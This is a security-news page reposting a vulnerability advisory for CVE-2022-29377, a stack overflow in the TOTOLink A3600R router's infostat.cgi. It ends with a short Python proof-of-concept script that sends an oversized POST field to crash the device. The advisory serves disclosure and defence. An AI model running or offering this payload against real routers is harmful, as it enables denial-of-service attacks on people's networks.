Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-29377: iot-cve/totolink/a3600r at master · molezsbd/iot-cve

Totolink A3600R V4.1.2cu.5182_B20201102 was discovered to contain a stacker overflow in the fread function at infostat.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via the parameter CONTENT_LENGTH.

CVE
Open in Source
#vulnerability#dos#wifi

Affect device: TOTOLink WiFi Router A3600R V4.1.2cu.5182_B20201102 (http://www.totolink.cn/home/menu/detail.html?menu_listtpl=download&id=63&ids=36)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

Vulnerability description

The stack overflow vulnerability is in the in the fread function in the infostat.cgi

We can see that stdin is obtained directly from the http request parameter .Then they will be spliced to stack by function fread without any security check,which causes stack overflow.

This vulnerability allows attackers to perform a Denial of Service(DoS) via the CONTENT_LENGTH parameter by POST the page /cgi-bin/infostat.cgi with long Code

POC

import requests data = {’a’:’a’*0x4000} res = requests.post("http://11.11.11.2/cgi-bin/infostat.cgi", data=data) print(res.content)

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE